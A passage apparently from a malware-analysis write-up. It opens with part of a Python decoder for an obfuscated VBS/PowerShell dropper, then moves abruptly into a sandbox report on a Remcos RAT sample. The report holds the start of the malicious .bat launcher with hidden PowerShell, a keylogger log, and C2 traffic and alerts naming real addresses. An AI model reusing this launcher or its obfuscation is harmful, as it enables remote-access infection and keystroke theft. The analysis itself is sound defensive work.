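    arg = m.group(1)
    if arg.isdigit():
        return int(arg)
    assigned = re.search(rf"\b{arg}\s*=\s*(\d+)", script)
    return int(assigned.group(1))


def resolve_string_builds(ps):
    """Follow $v='a'; ... $v+='b' chains in PowerShell text so split-up
    identifiers such as 'Sub'+'strin'+'g' read as one word."""
    built = {}
    for name, op, piece in re.findall(r"\$(\w+)\s*(\+?=)\s*'([^']*)'", ps):
        built[name] = piece if op == "=" else built.get(name, "") + piece
    return built


def decode(script=VBS_PREVIEW):
    launcher = decode_char_array(script, find_offset(script))
    payload = collect_fragments(script)
    return {
        "launcher": launcher,
        "window_style": window_style(script),
        "payload": payload,
        # Messingdr20 = launcher & " " & ChrW(34) & Ar6 & ChrW(34)
        "command_line": f'{launcher} "{payload}"',
        "resolved": resolve_string_builds(payload),
    }


if __name__ == "__main__":
    for key, value in decode().items():
        print(f"{key}: {value}")
```

The same three steps (find the per-character offset, decode the array, join the fragments) work on the full dropped file once it is exported from the sandbox; with the full script the `Ar6` string is the complete PowerShell stage, and `resolve_string_builds` will turn up the rest of the split method names it calls.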
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                            Category:dropped
                            Size (bytes):15728640
                            Entropy (8bit):0.10104014649099108
                            Encrypted:false
                            SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                            MD5:E796721168B5A15288B11EA0CF3FEAD1
                            SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                            SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                            SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                            Malicious:false
                            Preview:H...... ...................':...{........................T.....8+...{...,...{G.h.V.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.......................................,...{G......................,...{G..........................#......h.V.....................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\clip.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1239949490932863
                            Encrypted:false
                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                            MD5:271D5F995996735B01672CF227C81C17
                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                            Malicious:false
                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                            Category:dropped
                            Size (bytes):2
                            Entropy (8bit):1.0
                            Encrypted:false
                            SSDEEP:3:Qn:Qn
                            MD5:F3B25701FE362EC84616A93A45CE9998
                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                            Malicious:false
                            Preview:..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):461848
                            Entropy (8bit):5.961064380723656
                            Encrypted:false
                            SSDEEP:6144:GmQ2lhhntk1yFIE9AEoyfLg+v76hliiFcLtXDakuc0LKqwPP3BZvymZEzCEQ:JQ2lhxuyL9xfLDv76+iiwkl0L+fNEzdQ
                            MD5:FA0DB78253A792B3B978991CBBDD7C8A
                            SHA1:BE0DB3D29B49EAAE4484DF0CA573B79C64DFA60C
                            SHA-256:8AB001778C33FD3EDADC1E8FAF8CD422B6302870DD16055E6F9BACADD03D3FD7
                            SHA-512:A6B18A9BB966205DDE31D4B214EBBD4B43D4D13A7D48304AFD662E854BE82F51FEDAC9323F965D3C9D2E35889BE3932619716C12AD6C6B9EF1418461C6A806D9
                            Malicious:false
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):421548
                            Entropy (8bit):5.966651016215398
                            Encrypted:false
                            SSDEEP:12288:OxGg2qO4Yu6lxLXRoleGiQCRNkCcFdHaByI5tV:Z7qOomLaleSC6ZdHmLV
                            MD5:E7042BA465F066F0444926875BF66170
                            SHA1:230F14F3E1285A0B9FCD40546B423C36EC9DFD51
                            SHA-256:A3E66BE0C9E53E8E5B70E8E652FF35F925A07D7DF33B40BCD54BA51B9CD29B5A
                            SHA-512:DE3A4786F418A72BFB0F3F0C272E657C89B4B5A4A08483DF3664BEB243AD5F9B000928443314CC5FBD931120099954B8EF7F2DF0AC5A4A57529B8E5BE770B207
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6224
                            Entropy (8bit):3.730658941434748
                            Encrypted:false
                            SSDEEP:48:Xmf/7DClwGt9d3CybU2UYHukvhkvklCyws2Z12z1lHJDSogZocWZ12z1lLDSogZP:2f/PMd3CjTbkvhkvCCt/Gz1CHYGz1EHP
                            MD5:D2F809960DA80F221B5F2B94E6443859
                            SHA1:6C6F6DE750BDB10D0AE2A375C9B81B79DC5172DA
                            SHA-256:BE7C8BB200F58C844B84C1E1ED6045FFC5C3C55F7940941EF34BEDBD63A021CD
                            SHA-512:CAD3845CA346458141007935B7A4D404F9755EB68A4EFA48E18918157180F555660B9018912B7BE0FFC21DB8C41F665A50C2B13F2E7C9F9A8F0E125E69E636D6
                            Malicious:false
                            Preview:...................................FL..................F.".. ...J.S..."T..!...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....D.!...{..!.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X 1...........................^.A.p.p.D.a.t.a...B.V.1......X.1..Roaming.@......EW<2.X.1..../......................B..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X.1....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X.1....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X.1....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X.1....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X!1....u...........
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):994
                            Entropy (8bit):3.3784473451571766
                            Encrypted:false
                            SSDEEP:24:6jxcmcpWqUpfWqUini3WqUAMGnXSf1U1sWtnX1JW+:mc7WXWAi3W1GnY1UuW1rW+
                            MD5:04AD9D5E7A17E5BA364B570FFE2DAC73
                            SHA1:C320329BB8DD5C296436F6D020E03AB272ED1559
                            SHA-256:CE169F0591400CA340B877456F45C1FC274AF3D22D06CD03195681D48D6ABDD5
                            SHA-512:B18A108BD4288556C765E6EF563A556FAF256D01008FD37629EF04858B64180D7CE381FEF731F0DDD328CA80C6036A8F35B89CF04EB6DE98DF8CD86FFB2B8A6C
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\jiourhjs.dat, Author: Joe Security
                            Preview (UTF-16 decoded):
                              [2024/05/31 02:09:36 Offline Keylogger Started]
                              [2024/05/31 02:09:37 Run]
                              [2024/05/31 02:09:40 Program Manager]
                              [Win]r
                              [2024/05/31 02:09:45 Run]
                              [2024/05/31 02:09:46 Program Manager]
                              [Win]r
                              [2024/05/31 02:12:06 Run]
                              [2024/05/31 02:13:57 Program Manager]
                              [Win]r
                              [2024/06/02 01:00:54 Run]
                              [2024/06/02 01:02:39 File Explorer]
                              [2024/06/02 01:05:27 Contacts]
                              [2024/06/02 01:14:58 Program Manager]
                              [2024/06/03 13:22:51 Contacts]
                              [2024/06/04 19:43:27 Program Manager]
                            File type:ASCII text, with very long lines (6760), with no line terminators
                            Entropy (8bit):5.213680420090765
                            TrID:
                              File name:MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat
                              File size:6'760 bytes
                              MD5:cf28f43ef2773834bf4a17ee4e73f974
                              SHA1:b6c535298286f990f8fa81a380c8a13b62aadf5d
                              SHA256:0dc63c418ee423f0f461062eafc49a9804db70331ccf9188544725804e062127
                              SHA512:f3a3a6a9bdde8f506b28e109ecb98d3e4d8c2644ad11fcadeaf41ac2ccd497453a481b9838baeccafc89c77de22c17b3c9eae56530052d912287e6d70118eb31
                              SSDEEP:96:5+2w+sgiDfjJKA29RLB4F579VtsCiWdM2xo1lFvrc7qI4iENkTWE94+udCNIXYeP:Idxj129RL8JZsCHdM24TwmIGE94pck
                              TLSH:E9D13B749A551C3E8E2B07D08F8579030D927F3DE3C881949E19865825C2B7E36FA79D
                              File Content Preview:start /min powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentlighe
                              Icon Hash:9686878b929a9886
                              Timestamp                | Protocol | SID     | Message                                          | Source Port | Dest Port | Source IP       | Dest IP
                              05/31/24-08:09:37.861418 | TCP      | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin         | 51547       | 3050      | 192.168.2.6     | 178.215.236.110
                              05/31/24-08:09:38.586077 | TCP      | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 3050        | 51547     | 178.215.236.110 | 192.168.2.6
                              May 31, 2024 08:09:06.475749969 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.475775957 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.475866079 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.475899935 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.475912094 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.475935936 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.475981951 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.475984097 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476016998 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476049900 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476079941 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476110935 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476119995 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476130009 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476145983 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476181984 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476217031 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476217031 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476587057 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476655960 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476699114 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476706982 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476748943 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476756096 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476789951 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476794958 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476833105 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476862907 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.476867914 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.476918936 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481018066 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481067896 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481106043 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481121063 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481151104 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481198072 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481204987 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481245995 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481298923 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481306076 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481360912 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481393099 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481404066 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481430054 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481475115 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481508970 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.481519938 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.481587887 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564062119 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564089060 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564107895 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564129114 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564140081 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564142942 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564150095 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564172983 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564182043 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564191103 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564208031 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564218998 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564224958 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564244032 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564248085 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564274073 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564342022 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564357996 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564374924 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564384937 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564415932 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564687967 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564726114 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564775944 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564836979 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564871073 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564913034 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.564922094 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.564949989 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565023899 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565210104 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565247059 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565293074 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565373898 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565407991 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565453053 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565510035 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565546989 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565582037 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565597057 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565639019 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565654993 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565670013 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565685034 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565700054 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565710068 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565717936 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565737009 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.565743923 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.565784931 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566158056 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566174030 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566190958 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566206932 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566217899 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566242933 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566315889 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566332102 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566348076 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566364050 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566370964 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566381931 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566399097 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566412926 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566415071 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566428900 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566777945 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566823006 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.566953897 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566971064 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.566987038 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567008972 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.567141056 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567150116 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567158937 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567161083 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567168951 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567177057 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567183971 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.567187071 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567195892 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567198038 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.567203999 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.567224979 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.567250967 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.572223902 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572307110 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572316885 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572335005 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572346926 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572355986 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572360992 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.572369099 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572381020 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572391987 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572396040 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.572402954 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572413921 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572415113 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.572424889 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572442055 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572451115 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.572453976 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572463989 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.572477102 CEST4971280192.168.2.6194.59.30.6
